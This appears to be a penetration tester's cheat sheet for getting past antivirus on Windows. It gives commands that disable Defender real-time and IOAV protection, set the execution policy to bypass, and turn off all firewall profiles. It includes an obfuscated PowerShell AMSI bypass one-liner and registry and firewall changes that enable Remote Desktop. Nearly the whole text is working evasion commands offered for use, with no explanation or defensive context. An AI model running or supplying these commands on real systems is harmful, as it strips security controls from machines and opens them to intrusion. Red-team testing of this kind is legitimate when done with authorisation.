AV Bypass
Obfuscation Tools
To Run Invisi-Shell
If You Have Admin Privileges:
RunWithPathAsAdmin.bat
Without Admin Privileges:
RunWithRegistryNonAdmin.bat
Checking for AMSI Detection
To Use:
AmsiTrigger_x64.exe -i Invoke-PowerShellTcp.ps1
For obfuscation of a script
Checking For CLM (Constrained Language Mode)
$ExecutionContext.SessionState.LanguageMode
Running As a Different User
runas /netonly /user:{domain}\user powershell
If you have Administrator Access
set-executionpolicy bypass
set-executionpolicy unrestricted -f
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
AMSI Bypass
s`Et-iTe`m ('V'+( 'ari'+'ab'+'le:')+'soummya')( [tyPe]("{2}{0}{1}"-f'e','F','R')); ( ge`T-VAriAb`LE('soummya') -vAl )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Adding RDP Rule
Using cmd:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Using PowerShell:
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"